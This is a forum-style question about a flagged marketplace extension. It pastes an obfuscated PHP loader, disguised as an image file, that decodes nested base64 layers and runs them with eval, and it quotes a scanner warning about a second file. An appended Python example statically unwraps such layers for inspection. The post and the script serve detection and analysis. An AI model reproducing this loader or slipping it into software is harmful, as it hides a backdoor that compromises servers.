One of our extensions was flagged. Two of the files in the extension were brought to our attention as possible dirty files.
One is an image but it doesn't open in an image editor. I did open it up in Notepad and it shows PHP code?
Does this look suspicious? I don't want to raise the alarm just yet or contact the author. It's an extension in the marketplace.
<?php $eJOB = 'ICRyUXRUID0gJ0lDUkZhRTlZSUQwZ0owbERValZsUjJSWFNVUXdaMG93YkVSVmFrcHJZa1UxY0ZOVlVYZGFNRzkzWWtWU1ZtSnJjRlZaYkZKeVpVWk9WbFZZWkdGTlJ6a3pXV3RXYjFZeVNsbFJiVGxXWW01Q2RsbHRlRTlrVjA1RlZXMTRhVkl6VVRKV1ZFa3hVVEpHYzFSclpGTmlWRlpvVld4a2IyVnNjRVZTYm1SWFZsUkdTVmxyWkRCVk1ERlhZVE5rV0dFeFdrOVViR1JQVmpKS1IySkdhR2xXTW1oNFZrWmtlazFWTlZkaVJtUm9VbFUxVDFWc1pEUmxSbEp5V1hwR1ZsSXhXbGRWTWpWUFYwWmFSbU5JV21GU00xSjZWV3RhY21WWFVrWmxSazVPVmxjNU5WWnFSbE5VTVZsNVZXdGthbEp0YUZCV2ExWkxWRlphV1dOR1pFOVdiVko2VjJ0V2EyRkZNWE5YYkZaYVZsZE9ORmxVUm1GT2JGcDFVbTFHVTFZeFNqWlhhMk40VXpKT1IySXpjRkpoTTBKVlZUQlZNVTFXV2tWVWJrNVNUV3R3U0ZsVVRuTmhSazVIWTBWMFZsWkZjRlJVYlhocll6SkdSMVJzWkZkTlJuQmFWa1phYTA1SFJsWk5TR2hZVjBkU1ZWUlZaRk5oUmxKWFdrVjBhMUpzU25oVlZ6RnZWakpXZEdRemFGWmxhMHBRV1hwQk1HUXlUa1pWYlVaT1lsaG9URlpHWkhkU01sRjRZa1JhVldGNmJIRlZha0ozVFVaa1ZWTnVUbFZTYkZreVZtMXdRMWR0Um5KalJsSmFWbGRTVEZWclduWmxWMHBJWTBVMWFWWXlaRFZXTW5Sdll6Rk9kRlJyV2xCVFNFSlBWVEJWTVZReFZsVlRibkJPVFZVMU1Wa3dhSGRaVlRGWlVXeHNWMUo2UVRGWlZtUlhWbXhLZFZac1VtaE5SRll5VjFaU1MxTnRWbGRWYmtaVFlsZDRXRlJXV25abFJtUnlWbXM1YW1KV1NsbFZNV2h6VkRGS05tSkZkRnBpUmxWNFZGZDRjMlJGTlZkVWJXeFRUVlp3UzFac1l6RlZNV3hYVjJwYVYxZEhhRlZXYWtvelRVWnNjMXBHVGxoU1ZGWlpXVEJrTUZVd01YVmFNMnhZVm5wR2VsbHFTa3RTYlZKSFlrZHdUbUZzV2xKWGJGcFhVekpOZUZwR1ZsUmlWR3h5V1ZSS05GSldaSEpoUlU1YVZqQmFXVmxWYUU5V1ZrbzJWbXhTV2xaWFVsQmFSVnAzVTBkV1NHUkdTbXhpUm13MFZqRmtkMU14VlhsVGEyUldZbXhLVkZsdGVFdGhSbHBWVVd0a2FVMVdXa2hXUjNSTFlVWmFjazVXWkZWaVJuQklWbXBHWVdNeFNuVlJiRkpYVmxSV2FGZFhlRmRqTVU1SFYyeHNWMkpZVWxSVVZWcDJUVlpaZVdORmRGZE5SRVpIV2xWb1UxUXhaRWRqUjJoV1lXdGFhRlpWV210V01XdDZZVWRzVTFZemFFWldWM2hUWXpGT2MxSllaR3BTYkhCWFdXdGFkMlJzV25OWGEyUlhUVlUxZVZZeWVFdFdhekZJWlVST1ZrMXFWak5hVjNoMlpVZE9SMkZHVm1sV1IzaDNWMnhhVjFJeVVsZGFTRTVWVmtWYWNsUlhjekZOUmxwMFkwVjBXbFpzYnpKV2JHaHJWbTFGZVZWc2FGcGlSbkI2VmpGYVlXUldVblJrUmtwT1lsWkplbFpyVWs5ak1rWnlUa2hrYVZKWGFGaFpiR2hEWWpGV2RXTkhPV2xpUlRWNFZrWm9hMkZzU2xWaGVrWllWMGhDY2xVeWVFcGxSbVIxVW14d1YxWXdNSGRXTW5CRFpHMVdjazFWYkZKaVJVcHpWbXBCZDJWc1ZYaFdiWFJYVFd0YU1GVnRkRzlWUmtsNVZXdDRZVlo2Vm5KVVYza
HpUbXhPY2s5WGVGZE5SbkJoVmxaa2QxRXhWbGhTYkdoVlZrVTFWVlpzWkZOWFJteFlUVlZrVkZKVWJFbFhhMVl3WWtkS2RHRkliRmhXYkhCMlZqSjRkbVZIUlhwaVIzaFRUVzFvZUZaR1VrSmtNRFZYVkd4b1RsTkhhSEpaYTJoRFUxWldkRTVWT1ZSaVJXdzBXVEJqTlZkSFJYbFZiR1JhVm14YWVsVXdXbGRrUjBaSVpFWk9UbEpzYkROV2FrWnFaVVpKZVZKdVVsTlhSM2hYV1cweE5HTkdVbFZSYTFwUFZtczFXVlJzVlRWVWJFcDBaVVp3VjFaNlZrUldNakZYVm0xS1NFNVdhR2hOYkVwSlZrWldZV014V2taTlZteFVZbFZhV1ZWcVRtOWtNV1JZWTBWMFUwMXNXbGhaTUZaWFZHeEplV1ZIYUZwaVJscG9XbGQ0YzA1c1RuTlhiV2hYVmpOb1NsZFhkR3ROUmxaWFZsaGthbEpGU21GV2JURnZWVVp3V0UxVlpGaFNWRlpaVkd4V2QyRkdXbFppZWtwWVlURmFkbGw2U2s1bFIwNUhWbXMxVTAxdWFIcFhWbHBUVWpKUmVHSklVazVXYXpWd1ZXcEdZVkpzYkhWalJtUldVbXh3U1ZremNFZFdWVEI1WlVWMFZHVnJTak5VYlRGT1pWWndTRkpzWkU1U1JsbDVWakZqTVdNeFJuUlRiazVTWVRKb1YxbHRkRXRqYkd4WFZtdDBhbFp0ZUhsWGExWnJZa2RLVms1RVNsVldWMUo2V1ZaYVlVNXRTa2xUYkdoWFlsWkdObGRyVm1Ga01VNUlVMnRvYUZJeWVGUmFWekUwVFZaVmVGWnRjR3hTTVVwNldUQldiMVV5U25KT1ZUVlhZV3MxZGxwR1drOVdiR3Q2WVVkMGFWTkZTa3BXVnpBeFZERlNWMWRZYkd4U1JWcFpXV3hTUWsxR2JGZFhhMDVxVW0xM01sZHJWbmRWTURGWFkwaG9XRlpzV25GVWExcDJaREpPUlZkdGVGTk5NVXAyVm1wQ1lXTXlTbk5hUmxaVVlXeEtiMVZxUVhoT2JGcEhWVzVPVkdKVmNGWlZiWEJMVjBkRmVWVnJhRnBsYTBrd1ZqQmFVMlJXWkhSaVIyeHBVbGhDTmxZeFkzZE5WbFowVW14YWFWSlhhSEJWYWs1VFZXeGFWVkZ1WkU1U2JYaDRWVEo0VDJGR1NYZGpSVlpWVm0xU00xbFdWWGhqVmxwWldrWm9hVkl3TVRSV1JsWlhZekpPVms1VmFFOVdhMHB6Vm14V2QyVnNXWGhWYTNScFRXeEtlVmxyVmxOWGJWWjBZVWRvVm1GcmIzcGFWbHBQVm14d1JrOVhjRTVXTTJoaFZtdGpNV1F4VmxkV1dHUnFVa1ZLWVZsWGRIZFdSbXhXV2tWMFUxSlVSbGxVTVdSSFZqQXhSMk5JYkZkTmJtaDJWVEl4UjFadFNrWmlSbFpvWVRCd2VsWnRjRTlpTWsxNFZtdGtWV0V6VW05V2JURTBWMVphU0U1VmRGcFdWRUl6V1RCU1MxbFdTblJVV0doYVZrVkpNRll3V2xOa1ZtUjBZa1pPYkdKWVkzaFdhMUpMWXpGUmVWTnJaR2xUUlZwWFZqQmtiMVZHVm5KV2JGcE9UVlUxV1ZsdWNFTmhWMFkyWVhwR1ZsWjZSVEJXTW5ONFpFZEdSVk5zVWxkV1ZGWjRWa1JDYTFJeFNsZFdiR2hoVW01Q1QxbHRNVzlrYkdSWlkwVTVWV0Y2YkZkWmEyaFRWR3hrUjJOSGFGWmhhMHBvV2xkNFUxSXlSa2RVYlhCVFRWVndTbGRzVm10T1JrNTBVbXhhVkdGc2NHaFZiR1J2Wld4c05sSnVaRmRXVkVaSldXdGFkMVJ0Um5SbFJGcFlWak5DVUZVeWN6RmpiVVY2V2tab2FFMXNTbFZYVm1NeFZESk9SMVpyYUd4U00xSnZWV3BCTVUxR1VuT
mhSVTVvVmpCd1dWWkdVbE5XVmtwR1kwaFdWVlpXY0VSWk1GcHpUbXh3Um1OR1RrNVdia0kwVmpGYVYyRnJOVWRpTTJScVVrWndjbFJVUm5kaFJsWnhVMnBPYkZac1drbFphMlIzVkRBeFNHVkZiRmRpVkVZeldWVmFTMDV0UmtoT1ZsSnBZbXRGZDFkV1VrdFNNV1JYV2tab1lWSnVRazlaYlRGdlpHeGtXV05GT1ZWaGVteFhXV3RvVTFSc1pFZGpSMmhXWVd0S2FGcFhlRk5TTVhCR1pFZDBhVk5GU2t0WFZsSkxZekZXV0ZKc2FGVldSVFZWVm14a1UxZEdiRmhOVldSVVVsUnNTVmRyVmpCaVIwcDBZVVJDV0Zac2NISldha3BPWlVkT1JtSkdWbWxYUjJoNVZsZDBVMVV5VWxkVldIQnBVbFUxY0ZWdE1UQk9WbXhXWVVkR1ZHSkZWalZXUmxKVFYwZEZlVlZ1Y0ZWV00xSjZWVEJhUzJSV1VuUmhSbVJPWWtWc05GWnNWbUZVTVUxNVVtNU9hbEp0YUZCV2ExWkxZVVpaZDFadVRtcFNhelZYV1ZWVk5WUnNTWGhYYkd4aFZsZFJNRlpXV2xaa01rNUpWV3h3YUdFeWREUldSbFpYVGtaa1YxVnVWbEppV0dod1ZtMTRWbVZXWkZobFIzUlhUV3RXTlZWdGVITldNa3B6VTJ4R1lWWnNXbmxaTW5oaFVteHdTVlJ0YUdsVFJVcGFWa2Q0YjJReGJGZFdXR1JVWW10d1dWWnRNVzlXUm14V1ZtNU9WRkpyY0RGWmEyUkhWbXN4Um1JelpGaFdiSEIyVmtSS1YyUkdTbk5oUlRsWFpXeGFURlpzVWtOVE1WWnpZa2hLWVZKdFVtOVZha0Y0VGxaYWMxcEhkR2hTYkc4eVZtMXdZVmxXU2xoVmEyaGFaV3R3VEZWcldrZGpWa1owWVVaT1RsWnNjREZXYWtvMFlqSkpkMDFWWkdwU2JXaFFWakJvUTJJeFduVmpTRTVPVm1zMVYxZHJWbXRoVjBwSVpVWnNXbUV5YUZoV1JtUkhaRmRHU1ZGc2NFNWlXR2hFVjJ0a05GRXlUblJUYTJoT1ZsaENWVlZzVm5aTlZtUllZMFYwVkUxck1UUlpNRnB2Vkd4SmVWVnVSbFZXUlZwTVdrUkdjMk5zY0VWVWJVWk9ZWHBXU2xadE1ERmpNa1p5VFZoU2JGSkdjR2hWYkZVd1pXeGtjVk5yT1ZSU01WcEpXbFZhZDFkR1NsVldibkJXVFZaYWNsWkVTbE5rUms1MVZteGFhVll5YUdoV1JsSkhVakpLYzJORlpHaFNWRlpvVkZab1EwMUdVWGhoU0U1VVlrVnNNMVl5Y0dGWGJWWnlZMGh3WVZaNlJsUlZNRnBMWkZaYWMyTkZOV2xTYkd3MFZteFdWMVJyTlZoU1dHeFRZa2Q0V1ZaVVRsTlVSbkJZVGxVNWFXSkhVbnBYYTFVMVlWVXhjbUo2UmxaV2JVMTRWbFphUjA1dFNrbFZiSEJYWWxaS1dWZFljRWRrTVU1WFZXNVNiRkl6VWxSVmExcExUVlphUlZSdVRsSk5hM0JJV1ZST2MyRkdUa2RqUlhSV1ZrVndUMVJyV2xOU1ZrNXpWRzF3VTAxVmNEUldSM1JxVFZaV1NGWnNXbFJpYXpWWlZtdFdkMlJzY0Voa1NFNVRVbTEzTWxsVlZYaFViVXBHWTBST1dHRXlVakpVVldSTFkyczVWVlpzU21sWFIyaG9Wa1pqZUdJd01YTlViRnBWWWxoQ1VWVnNhR3RPVmxwWVRsVk9hRTFyV25oV1Z6VlhWbFV3ZVdWRlVscGhNWEI1V2xaa1IxTldaSEpqUmtwT1lYcEJkMVpyVmxOVE1WVjVWR3RvVm1KcldsQlZibkJYVlZad1YxWnJXbEJXV0VFeVdYcEtNRlpzU2xsYVJ6VldVbXMxUTFsdGRIZFRSMUpJWWtkb1VrM
UZWVEZWTVZaclV6SkdTRlJZYkZkV1JYQlFWVzF3YzJOc1pITmFSVGxyWWtoQ1NWWnNZelZUTVVsNlZXdDRXbUZyTlZkWk1GVTFUbFpHZEdWSGRHbFdWbkEyVlhwQ1QxVXlUbk5pU0ZKaFRUQktVVnBXWkU1Tk1XUnpZVWRHYUZJd2NFVlhha293Vm14S1dWcElaRlZOTWswMVZVWk9hazR3Y0VoV2FrSktVa1JDYmxOdWJGTlNNVlYzVFVka1VWVXdTbkJYVm1oUFlrVTFjVlZ0V21GU01WcHhXV3BLVTJKRmRFUlZha3ByWWtVMWNGTXhVbnBhTVhCWlYyMW9hVkV5WkhKVmJYaFBWR3QwVldNeU5WQk5iRmw1VjFaa00ySXdjRWhXYWtKTVZraE5PVXA2YzJ0a00wbG5VRk5CYmtwSE9XbFplVUU1U1VkS2FHTXlWVEpPUmpscldsZE9kbHBIVlc5S1NHdzBXakZaY0U5NVFteGtiVVp6UzBOU2RsbHRUWEJQZVdNM1dsaGFhR0pEWjJ0a00wbHdUM2M5UFNjN0pIUnRJRDBnSnlSamFIRWdQU0JpWVhObE5qUmZaR1ZqYjJSbEtDUkZhRTlZS1RzZ1pYWmhiQ2drWTJoeEtUc25PMlYyWVd3b0pIUnRLVHM9JzskcUwgPSAnJEhPYSA9IGJhc2U2NF9kZWNvZGUoJHJRdFQpOyBldmFsKCRIT2EpOyc7ZXZhbCgkcUwpOw==';$OV = '$Kyp = base64_decode($eJOB); eval($Kyp);';eval($OV);?>
The other file is the settingsp.php code with similar code. The warning we got was:
WARN: Found suspicious file: admin/model/extension/module/xxxxxxxxxx-settings.php (NOT CLEANED) - Manual inspection required (rex.eval_var.002): Content: '';eval($bh);?>'.
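Added example, not part of the original post: a way to inspect a file like the one above without running it, by statically peeling each `base64_decode` + `eval` layer in Python and listing the calls each layer contains. It assumes every inner layer has the same shape as the outer one shown in the post; the sample input, the `wrap` helper and all names are constructed for illustration.

```python
import base64
import binascii
import re

# A single-quoted PHP string literal made up only of base64 characters.
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/=\s]{16,})'")
# Calls worth noting when reading a decoded layer by hand.
CALLS = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13|assert|system|"
                   r"exec|shell_exec|passthru|file_put_contents)\s*\(")


def wrap(php_code: str, var: str) -> str:
    """Build one layer shaped like the posted file (used for the sample only)."""
    blob = base64.b64encode(php_code.encode()).decode()
    return f"${var} = '{blob}';$s = '$d = base64_decode(${var}); eval($d);';eval($s);"


def peel_layers(source: str, max_depth: int = 64) -> list[str]:
    """Return every decoded layer, outermost first. Nothing is executed."""
    layers, current = [], source
    for _ in range(max_depth):
        candidates = B64_LITERAL.findall(current)
        if not candidates or "base64_decode" not in current:
            break  # no further encoded layer to unwrap
        blob = "".join(max(candidates, key=len).split())  # drop line breaks
        try:
            decoded = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            break  # not valid base64: stop and inspect by hand
        current = decoded.decode("utf-8", errors="replace")
        layers.append(current)
    return layers


def flag_calls(layer: str) -> list[str]:
    """Sorted names of notable PHP calls that appear in one layer."""
    return sorted(set(CALLS.findall(layer)))


# Constructed sample: a harmless statement wrapped three times.
INNER = 'echo "constructed innermost payload";'
SAMPLE = "<?php " + wrap(wrap(wrap(INNER, "a"), "b"), "c") + "?>"

if __name__ == "__main__":
    for depth, layer in enumerate(peel_layers(SAMPLE), start=1):
        print(depth, flag_calls(layer), layer[:60])
```

To use it on a real file, read the file as text on an analysis machine and pass the contents to `peel_layers`; the last element of the returned list is the code that would finally run.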